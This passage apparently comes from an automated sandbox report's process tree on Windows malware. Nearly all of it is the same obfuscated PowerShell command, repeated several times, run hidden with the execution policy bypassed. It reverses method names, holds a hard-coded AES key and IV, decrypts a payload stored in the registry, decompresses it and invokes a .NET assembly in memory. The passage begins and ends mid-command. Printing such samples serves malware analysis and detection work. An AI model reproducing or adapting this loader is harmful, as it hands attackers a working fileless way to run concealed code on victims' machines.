-join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        6⤵
        
        PID:4372
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:1128
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:1568
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('syA5EvsXvOKxGBhz+CR86w==');$NrSJK = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NrSJK, 0, $NrSJK.Length);$NrSJK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NrSJK);$hNQmD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wiGRZbwj08s5ccnY2fiFog==');$hNQmD = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hNQmD, 0, $hNQmD.Length);$hNQmD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hNQmD);$DkNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PZgrGVa646VrGOS9G04j/Q==');$DkNHQ = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DkNHQ, 0, $DkNHQ.Length);$DkNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DkNHQ);$UJmpm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdkCE0NfVCsWgdXTOY/C1g==');$UJmpm = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJmpm, 0, $UJmpm.Length);$UJmpm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJmpm);$XAOdY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gPoDSCGApMCmQB1PvehUTQ==');$XAOdY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XAOdY, 0, $XAOdY.Length);$XAOdY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XAOdY);$YJUZY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qOTGlwNsOu7GjN+WYtV3A==');$YJUZY0 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY0, 0, $YJUZY0.Length);$YJUZY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY0);$YJUZY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oYPFDUYl40yftzDaxfoTSw==');$YJUZY1 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY1, 0, $YJUZY1.Length);$YJUZY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY1);$YJUZY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XXjnNR3Sswka2j4WlAp3TQ==');$YJUZY2 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY2, 0, $YJUZY2.Length);$YJUZY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY2);$YJUZY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BakZq23+iwvKDrU0Eno//w==');$YJUZY3 = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY3, 0, $YJUZY3.Length);$YJUZY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY3);$zKteB.Dispose();$RGTVc1.Dispose();$PFTMy = [Microsoft.Win32.Registry]::$UJmpm.$DkNHQ($YJUZY).$hNQmD($FxgyF);$bKVUD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($PFTMy);$RGTVc = New-Object System.Security.Cryptography.AesManaged;$RGTVc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$mDPLY = $RGTVc.('rotpyrceDetaerC'[-1..-15] -join '')();$bKVUD = $mDPLY.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bKVUD, 0, $bKVUD.Length);$mDPLY.Dispose();$RGTVc.Dispose();$WkXXy = New-Object System.IO.MemoryStream(, $bKVUD);$BFsRj = New-Object System.IO.MemoryStream;$eyYzu = New-Object System.IO.Compression.GZipStream($WkXXy, [IO.Compression.CompressionMode]::$YJUZY1);$eyYzu.$XAOdY($BFsRj);$eyYzu.Dispose();$WkXXy.Dispose();$BFsRj.Dispose();$bKVUD = $BFsRj.ToArray();$tHATD = $jXIqy | IEX;$qHSaO = $tHATD::$YJUZY2($bKVUD);$wybTP = $qHSaO.EntryPoint;$wybTP.$YJUZY0($null, (, [string[]] ($uduqT)))
        7⤵
        
        PID:3208
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $RGTVc1 = New-Object System.Security.Cryptography.AesManaged;$RGTVc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$RGTVc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$RGTVc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0Vhj+8SvKvWSoAI3H80nqz3WBAcVwKeS+mcInP5cBE=');$RGTVc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAbxL7tE2+vAEI/onUDZow==');$zKteB = $RGTVc1.('rotpyrceDetaerC'[-1..-15] -join '')();$YJUZY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u3vBDix/Dvzu1bNqIQRl5A==');$YJUZY = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YJUZY, 0, $YJUZY.Length);$YJUZY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YJUZY);$FxgyF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3qJmctKqd3cKI9f/LSjUTTZfi7VZWgSF/mV4pnIBCY0=');$FxgyF = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FxgyF, 0, $FxgyF.Length);$FxgyF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FxgyF);$uduqT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a/YRTjsaXrUpzDKih9OVYw==');$uduqT = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uduqT, 0, $uduqT.Length);$uduqT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uduqT);$jXIqy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01OluqzYGp7VpcaRAzTEuhBKHeZhEYzImru7nL0XrpTApAAe2nuJWHtDCVSBiU4K+OqG4TWQCs49ZHgcfWfi+euR/Mv2ayGei2SjeZtJc59djoC9/7q0oIcHnQKO86GNcccbBPnosHT1J0+yqZkcMnDYoec6tOMIX+FO2Q7gJAtiDpsPuQ1nyAKZNxGQcDummAmv3RVg1Zz4Pn9Fqbl08BNtgqWHl2Ol+gU/EEu6csFmcl5KvBGR5yLvJJfHyukRx6NQvUT0kUQI4pvttwYdib8yt2A+olytLLxSrFAtLNYm5BpvCwrWZOPOIQBj0Ji4qnEXnkpW34WQnTRiwcH9iRuPL7yUaopjqEQS9uPzd7cMOFQgqqN4qJxPks+ref0tCg6WdX14j1/i0FPbVy2pENJEdQH7+O7bjFDcgWcQDO4=');$jXIqy = $zKteB.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jXIqy, 0, $jXIqy.Length);$jXIqy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jXIqy);$NrSJK = 